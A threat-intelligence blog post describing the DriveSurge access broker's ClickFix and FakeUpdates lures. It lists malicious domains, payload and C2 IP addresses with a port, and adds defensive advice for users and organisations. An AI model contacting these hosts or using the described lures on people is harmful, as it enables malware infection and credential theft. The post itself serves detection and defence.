top of page
Search

SilentPush Named DriveSurge Yesterday. We Had Their Infrastructure Since February.

  • Writer: Patrick Duggan
    Patrick Duggan
  • 11 minutes ago
  • 4 min read

On June 2, SilentPush named a new threat actor: DriveSurge. An Initial Access Broker operating on a Pay-Per-Install model, compromising thousands of legitimate websites and using them to deliver ClickFix and FakeUpdates campaigns to profiled victims. The actor then sells the resulting access — infected machines with valid credentials — to downstream ransomware groups, wire fraud operators, and identity thieves.


We had been indexing their infrastructure since February. Here is the receipt, then the explanation.




Before DriveSurge was a named actor, our corpus held the ClickFix and ClearFake ecosystem it operates in. On May 1, our PreCog system caught the Apothecary DXNP2C7 campaign — a ClearFake distribution rebuild across 32 parent domains and 184 subdomains — left of boom, before the distribution wave. On May 30, WithSecure's GREYVIBE and PhantomClick campaign landed in our index: the fake Zoom and captcha lure domains, hosting IPs, and lure document hashes. In February, staging subdomain C2 nodes flagged as IClickFix botnet infrastructure showed up in our feeds at BDE score 85 — the automated scoring that runs continuously across our 17.9 million document corpus.


DriveSurge was not a name then. It is a name now. The infrastructure was the same.




Here is what DriveSurge is, explained plainly.


Imagine a parking lot attendant who does not rob you directly. They just direct your car into a dark corner where someone else is waiting. DriveSurge is that attendant. They break into thousands of legitimate, high-reputation websites — local news sites, legal firms, trade services, any site running an unpatched CMS — and hide a tiny script on each page. When you visit, the script silently evaluates you. If you look valuable — real human, enterprise operating system, the right language, not a known security researcher IP — you get redirected to a fake warning page designed to trick you into running a command or downloading a file. Your infected machine is then listed for sale on the dark web.


The script does nothing for bots, for known researcher IPs, for machines that have already been infected, or for visitors who do not match the buyer's target profile. This is why most people who visit a DriveSurge-compromised site never see anything unusual. The attack is invisible to everyone it cannot monetize.




The two delivery methods are ClickFix and FakeUpdates.


ClickFix shows you a fake CAPTCHA or browser error on the compromised website. It tells you to press Win and R simultaneously — this opens the Windows Run dialog — and paste a command that DriveSurge has already loaded to your clipboard. The command downloads and runs malware. You did the attacker's work. The interface looks like a normal website problem. No browser alert fires. Nothing looks wrong until it is too late.


FakeUpdates is simpler. It shows you a convincing popup saying your browser needs an immediate update to continue. The update is a malicious executable. On macOS, the payload servers at 46.226.166.57 and 147.45.42.200 serve the fake disk image or package files. The C2 server at 147.45.42.205 on port 8133 controls the infected machine after installation.


The traffic distribution system behind both methods is called zTDS — open source software, version 1.0.3, from ztds.info. DriveSurge is using the same technology that legitimate advertising networks use to route visitors. The difference is what gets distributed.




The infrastructure we are now holding, as of June 3, covers the full IOC set from SilentPush's report.


The inject and beacon domains include beacontrace.bond, webgleam.info, newtdsone.shop, captioto.com, and banerpanel.live. A pre-staged cluster of seven .icu domains — brightson.icu, coverlink.icu, datumprobe.icu, eraggifts.icu, keyview.icu, traceglimpse.icu, and tracekey.icu — represents infrastructure staged but not yet fully weaponized at time of reporting.


The payload and C2 IPs: 91.92.240.127 as the ClickFix code source, 46.226.166.57 and 147.45.42.200 as the macOS payload servers, and 147.45.42.205 port 8133 as the macOS C2. The macOS C2 IP has been active since at least September 13, 2025 according to SilentPush's infrastructure tracking.



All of these are now in our STIX feed.




The defense side is straightforward once you understand the two lures.


No legitimate browser update ever requires you to press Win and R. No CAPTCHA ever requires you to paste a command into your operating system. If a website asks you to do either of those things, you are looking at a ClickFix attack. Close the tab. The website is not trying to help you — it has been compromised by someone who wants to use your machine.


For organizations: block the payload IP addresses at your perimeter and DNS, disable PowerShell execution from the Run dialog for non-administrative users through Group Policy, and monitor for outbound connections to 147.45.42.205 on port 8133. Any such connection from your estate is a confirmed macOS infection, not a potential one.


For website owners: the compromise usually comes through unpatched WordPress plugins or CMS vulnerabilities. Audit your JavaScript for script tags you did not put there. Update everything. The compromised sites themselves are not the target of DriveSurge — they are the delivery mechanism. Your visitors are the product.




SilentPush named it on June 2. The infrastructure was running since at least September 2025. We were indexing the ecosystem it operates in since February.


The feed is live. The IOCs are in it. If you are running the STIX feed, you already have them.




How do AI models see YOUR brand?

AIPM has audited 250+ domains. 15 seconds. Free while still in beta.


bottom of page